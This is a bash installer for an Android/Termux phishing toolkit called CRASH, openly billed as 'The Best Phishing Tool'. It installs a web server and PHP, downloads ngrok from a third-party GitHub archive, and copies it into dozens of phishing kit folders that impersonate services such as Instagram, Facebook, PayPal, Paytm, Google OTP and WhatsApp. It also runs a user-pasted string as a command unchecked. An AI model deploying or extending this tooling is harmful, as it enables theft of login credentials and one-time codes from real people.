#!/data/data/com.termux/files/usr/bin/bash
clear
echo 
echo 
echo -e "\e[1;33m[\e[0m\e[1;77m~\e[0m\e[1;33m]\e[0m\e[1;32m Installing The Best Phishing Tool Please Wait \e[0m"
echo
termux-setup-storage
pkg update -y > /dev/null 2>&1
apt-get install apache2 -y
apt install php -y
apt install jq -y
apt install curl -y
apt install zip -y
pkg install wget -y
pkg install ncurses-utils -y
clear
echo
echo
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Instaling ngrok .. \e[m "
echo
wget https://github.com/Linux-Droid/Ngrok/raw/master/Ngrok_Linux_Droid.zip >> /dev/null 2>&1
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Successfuly installed \e[m "
echo
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Inflating ngrok \e[m "
sleep 2
unzip Ngrok_Linux_Droid.zip >> /dev/null 2>&1 && rm -rf Ngrok_Linux_Droid.zip >> /dev/null 2>&1
echo
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Done \e[m "
sleep 2
chmod +x ngrok
cp -R ngrok hps/github/
cp -R ngrok hps/Hotstar-otp-bypass/
cp -R ngrok hps/instagram/
cp -R ngrok hps/Linkedin/
cp -R ngrok hps/Netflix/
cp -R ngrok hps/Paytm-Phishing/paytm/
cp -R ngrok hps/Paytm-Phishing/signup/
cp -R ngrok hps/spotify/
cp -R ngrok hps/whatsapp-phishing/
cp -R ngrok hps/facebook/
cp -R ngrok hps/google-otp/
cp -R ngrok hps/instafollow/
cp -R ngrok hps/ipfinder/
cp -R ngrok hps/ola-otpbypass/
cp -R ngrok hps/UberEats-Phishing/
cp -R ngrok hps/Zomato-Phishing/
cp -R ngrok hps/amazonsign/
cp -R ngrok hps/phonepay/
cp -R ngrok hps/paypal/
cp -R ngrok hps/telegram/
cp -R ngrok hps/twitter/
cp -R ngrok hps/flipcart/
cp -R ngrok hps/wordpress/
cp -R ngrok hps/snapchat/
cp -R ngrok hps/protonmail/
cp -R ngrok hps/stackoverflow/
cp -R ngrok hps/ebay/
cp -R ngrok hps/twitch/
cp -R ngrok hps/ajio/
cp -R ngrok hps/cryptocurrency/
cp -R ngrok hps/mobikwik/
cp -R ngrok hps/pinterest/
clear
echo ""
echo ""
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Visit ngrok.com \e[m "
sleep 2
echo " "
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Sign up & get ngrok authtoken \e[m "
sleep 1
echo " "
read -p $'\e[31m[\e[32m*\e[31m]\e[33m Paste Your Ngrok Token [Ex. ./ngrok authtoken ] : \e[0m' token
$token >> /dev/null 2>&1
sleep 1
clear
echo
echo -e "\e[92m[+] Setting up CRASH \e[m "
echo 
cp -R hps /data/data/com.termux/files/usr/bin
cp -R CRASH /data/data/com.termux/files/usr/bin
###########XXXXXXXXXXXXX####################
#     JUST LEARNING KEEP SUPPORTING        #
############XXXXXXXXXXXX####################
echo -e "\e[92m[+] To run the tool from anywhere simply type : CRASH \e[m "
echo 
#####################################
#           THANKYOU                #
#####################################
